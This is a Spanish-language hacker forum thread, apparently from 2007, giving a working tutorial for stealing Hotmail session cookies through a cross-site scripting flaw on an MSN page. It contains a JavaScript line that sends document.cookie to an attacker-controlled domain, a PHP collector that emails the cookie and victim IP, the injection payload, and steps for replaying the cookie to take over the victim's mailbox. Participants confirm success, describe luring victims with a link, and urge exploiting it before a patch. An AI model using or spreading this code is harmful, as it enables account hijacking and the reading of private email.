Foro de elhacker.net

holaa! que tal =)
ayer estaba chequeando a internautas.org y vi esta noticia:
http://seguridad.internautas.org/html/4140.html

...y me gustaria saber donde se encuentra la descarga de este exploit y quería comprobar si es verdad que funciona, por cierto como se llaman los programas que modifican la cookie que sale en la noticia?

Graccias!

ACTUALIZACIÓN: parece ser que Microsoft ha corregido finalmente la vulnerabilidad. Sin embargo esto no invalida totalmente el tutorial, ya que a la que vuelva a aparecer otra página vulnerable a ataques XSS - y posiblemente aparecerá - simplemente tendremos que modificar el paso 4.

Como prometí hace unos días, voy a colgar un paso a paso de cómo obtener acceso a cuentas de Hotmail de otros usuarios a través del robo de la cookie, posible gracias a hecho de que existe una vulnerabilidad sobre la cual leí hace ya tres semanas en Full Disclosure de insecure.org Full Disclosure rss feed y a día de hoy, 6 de septiembre, sigue sin estar solucionada.

Este paso a paso está basado tanto en esa información como en un tutorial acerca de una vulnerabilidad similar detectada el año pasado,

Eso sí, tened en cuento que si bien lo que voy explicar no constituye un delito, el entrar en la cuenta de correo de otra persona sí que lo es – o al menos creo. Tened también en cuenta que esto tampoco sirve para recuperar la contraseña de una cuenta de Hotmail. Lo único que hacemos es apropiarnos de la cookie de un usuario que ya está identificado en Hotmail y hacernos pasar por él. Por último, recordad que la cookie sólo será válida durante unas cuantas horas – 8 como máximo según mi experiencia -, y que para poder realizar todo el proceso necesitaremos algún dominio que pueda ejecutar scripts de servidor (PHP en el caso de este tutorial).

Una vez aclarados esos puntos, pasamos al tutorial:

   1. Creamos una cuenta en Hotmail sobre la que hacer las pruebas.
   2. Creamos el fichero javascript cookie.js, sustituyendo www.tudominio.com por la ruta donde alojes los scripts.

      location.href='http://www.tudominio.com/cookie.php?cookie='+escape(document.cookie)

      Este script lo único que hace es llamar a una página PHP que se encargará de guardar la cookie.
   3. Creamos el fichero cookie.php, sustituyendo nombre@correo.com por el tu propio correo al que enviarás la cookie, y http://www.otrodominio.com por la URL de un dominio cualquiera, que será a donde será redirigido al usuario una vez haya finalizado el proceso.

      <?
      $cookie = $_GET['cookie'];
      $ip = getenv("REMOTE_ADDR");
      $msg = "Cookie: $cookie\nIP Address: $ip";
      $subject = "cookie";
      mail("nombre@correo.com", $subject, $msg);
      header ("location: http://www.otrodominio.com");
      ?>

   4. Creamos un fichero pagina.html, que será la página que deberá cargar el usuario para iniciar el proceso. Evidentemente, podemos cambiar el nombre del fichero, para hacerlo más apetecible para el que tiene que hacer clic.

      <meta http-equiv="refresh" content="0; url=http://newsletters.msn.com/xs-v3/insite.asp?CU=1&RE=')></script><script src=http://www.tudominio.com/cookie.js>">

      En el código hay que sustituir www.tudominio.com por el nombre de dominio donde hayas alojado los otros dos fichero cookie.php y cookie.js. La página únicamente se encarga de redirigir al usuario a la página de Microsoft vulnerable al ataque http://newsletters.msn.com/xs-v3/insite.asp, que a su vez y debido a la inyección del script en la URL redirige el usuario a nuestra página cookie.js, que llama a cookie.php que recoge la cookie y la envía a nuestro correo.
   5. Ahora sólo tienes que enviarte un correo electrónico a la cuenta de Hotmail que hemos creado en el paso 1, con un enlace a la página http://www.tudominio.com/pagina.html, y hacer clic una vez llegue el correo. En breves instantes recibiréis un correo en la dirección que hemos puesto en el fichero cookie.php, con la cookie de usuario y la IP.

   6. Una vez hemos conseguido la cookie es el momento de usarla para hacernos pasar por ese usuario. Para ella nada mejor que un programa como Proxomitron.
   7. Bajamos el programa, lo ejecutamos, y en la primera ventana dejamos marcado solamente Outgoin Header Filters y pulsamos el botón Headers

   8. En la siguiente ventana desmarcamos todas las opciones a excepción de la casilla out de Cookie: Fake a cookie (out), seleccionamos la opción y pulsamos Edit.

   9. Ahora sólo tenemos que introducir la cookie recibida en la casilla Replacement text, pulsar Ok, pulsar Apply. A partir de este momento, tenemos configurado el programa para que ante cualquier petición de página, envíe esa cookie.

  10. Ahora tenemos que configurar el navegador para que utilice a Proxomitron como proxy. Para el tutorial he utilizado IE, evitando así tocar configuraciones de mi navegador habitual, Opera. Vamos a Herramientas – Opciones de Internet – Conexiones – Configuración de Lan… - marcar utilizar un servidor Proxy y poner en Dirección 127.0.0.1 y en Puerto 8080. A partir de ahora todas las páginas que carguemos desde el IE pasarán por Proxomitron, que únicamente enviará la cookie que hemos configurado.

  11. Cargamos la página http://my.msn.com y si estamos en la página personal de la cuenta creada en el paso 1, solo tenemos que pulsar en el enlace a Hotmail y entrar en el correo. Si no, basta con recargar la página para asegurarnos de que la cookie se ha escrito.
---------
FUENTE SACADA DE :
http://blog.kibara.com/
saludos

Mas info: http://www.noticiashacker.com/2007/03/21/explotando-xss-en-hotmail/ (http://www.noticiashacker.com/2007/03/21/explotando-xss-en-hotmail/)

ya encontré la página del creador de este ataque y su versión aún funciona, lo que me falta es el programa "the proxomiltron" no lo encuentro en ningún lugar, alguien me lo podría ofrecer? Graccias!

No cuesta tanto buscar en google.

http://www.proxomitron.info/files/index.html (http://www.proxomitron.info/files/index.html)

Bueno moviendo el tema, sigue como oday, ya esta parchado, alguna novedad, alguien lo exploto, por que lo maximo que  llego es el pantallado del msn, que sale mi nombre pages, con la tecnica escrita arriiba, me gustaria empezar una discucion sobre este tema

El Bug aun no ha sido corregido, aun puede ser explotado, este bug era private pero pronto sera corregido porque ya fue enviado a milw0rm, aprovechen mientras puedan :P ;)

seria probar el bug----




 ;D ;D ;D ;D

Yo lo acabo de probar, y va todo bien hasta que me meto en http://my.msn.com para luego hacer clic en Hotmail, debería estar identificado pero no, me pide usuario y contraseña.

Acabo de hacer todo =P

pero el mail me llega

cookie=
ip= x.x.x.x

Osea en la cookie no capturo nada =S

como seria para q capture la cookie^^?

y si se manda un fichero html el cual capute la cookie

y al abrir la pagina dentro de su correo lo haga?

yo lo intente y me sale esto


SafeRedirect=%26hm___ts%3d1174869049%26hm___ha%3dd67a34fa15429bcc521fa8673cdc99b1
SafeRedirect=%26hm___ts%3d1174869049%26hm___ha%3dd67a34fa15429bcc521fa8673cdc99b1


¿¿?? alguien explica porfavor?

El bug que estas usando esta parchado e antigua, lo maximo que te manda es a nombre(cuenta) pages y de ahi a donde le des click eje hotmail, te pide password.
En tu caso evilgoblin , es lo mismo estan utiliando un bug antiguo, ojooooo que  la tecnica es igual, pero se dispara a otro lado

El nuevo bug aun es oday, y no va orientado a http://newsletters.msn.com  ;)

Habia leido mal =P.

ahora estoy intentando mandarme el mail ^^

y si logro que funcione. (conmigomismo)

intento resolver la duda para que kede claro =P

porlomenos antes de q deje de ser 0day xD

Entonces... ¿es posible sacarle provecho a este fallo o ya está parcheado?

consegui la Cookie =P

pero el problema esta ahora que yo cierro la sesion para poder ver si funciona y al cerrar la sesion deja de tener validez.

asi q voy a prender la otra pc y probar con las 2 pcs

haber si funciona =D


^^ tengo noticias y posteo

Bueno bueno! =D

FUnciona! =P

la onda es asi..

http://www.noticiashacker.com/2007/03/21/explotando-xss-en-hotmail/

segui esas instrucciones para construir la pagina mal formada

luego conectate a tu cuenta en hotmail

y enviale un email a quie nkieras robarle la cookie

con la url www.tudominio.com/index.php

luego de q esta persona entre a esa url

te va a llegar a tu mail la cookie

entonces abris el proxomiltron

y luego de seguir las instrucciones q detallo mas arriba ToxiT

volve a la pagina de hotmail donde estas logeado con tu cuenta

y pone en hotmail

y listo ^^

estas logeado con la otra cuenta

(COMPROBADO)

Nada, yo llego a http://my.msn.com y desde ahí puedo ver la página personalizada de la "víctima", pero en el momento en el que hago clic en el enlance de arriba de Hotmail, me pide que me identifique y si lo hago en el enlace MSN Home me lanza este error...


¿Es posible que no se pueda acceder porque la víctima no utiliza Windows Live?

No veo otra explicación, aparte de la que ya está parcheado, pero viendo a usuarios como evilgoblin que afirman que funciona entro en dudas...  :huh:

mira te explico como hago yo.
luego de eso del link y de obtener la cookie.

si no sabes como preguntame a (goblin.evil@gmail.com)

luego de eso, primero voy a hotmail
y me registro con mi cuenta
estoy viendo mis mails
luego uso ese programa
cargo la cookie
activo el proxy

y hago click en mensajes
y estoy adentro =S

^^ espero q te sirva

Adios!

Cookie:
IP Address: 212.78.204.31\Time: Thursday 29th of March 2007 02:25:44 AM

 la cookie no la recibo demoniossss ... alguien sabe por que comprovare los php

solucionado error mio al escribir el codigo funciona perfecto si alguien tiene problemas que me consulte estoy a vuestra entera disposicion

esperemos que esto dure mucho mucho tiempo  :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes:

la verdad es que bugs de este tipo no duran mucho y menos tratandose de hotmail, sean niños buenos y no rompan nada que de seguro a nadie de ustedes les gustaria que alguien les hiciera lo mismo verdad?

Comprobado, acabo de realizar unas pruebas en casa y funciona correctamente, solo que si el que va a falsear la cookie se encuentra en Windows Live Mail y la "víctima" no, no se podrá falsear la cookie.

Obiamente la "victima" tiene q usar hotmail desde IE y no con thunderbird  =P . nisikiera se si con firefox funciona xD.
pero eso si.
quiero comprobar la caducidad de estas "galletitas"
hasta ahora sigo probando con el primer intento q hice q fue hace 20 hs y sigue andando la misma cookie.
creo que solo dejara de funcionar cuando la "victima" habra desde otra pc y se cambie la cookie, o cuando le de al boton cerrar sesion.
yo solo lo hago como "prueba" mi intencion no es romper nada, ya que no vale de nada, no necesitas ser un SuPer jaquer para hacer eso =P.. cualquiera con un simple manual sin conocimientos puede hacerlo.
Asi que no eleven demasiado su autoestima xD.

SUERTE! =).
y esperemos que hotmail resuelve rapidamente este error

lo mas seguro es que te siga funcionando ya que son pocas las personas que habilitan la opcion de caducidad de sesion, que por seguridad lo deberian de hacer.

Al parecer el bug dejo de funcionar xD.. alfin arreglan algo =S

joer, ahora q iva a probarlo yo  >:( >:( >:(

perdonad me podriais ayudar a crear eso d cookie.js q no se como se ace axias

Me temo que llegas tarde, las ultimas respuestas son de Abril del 2007 y dicen que ya esta corregido, solo hay que leer un poco. Si has llegado aqui buscando como robar contraseñas de hotmail me temo que primero vas a tener que estudiar un poco mas como funciona todo y luego tal vez encuentres la forma de hacerlo.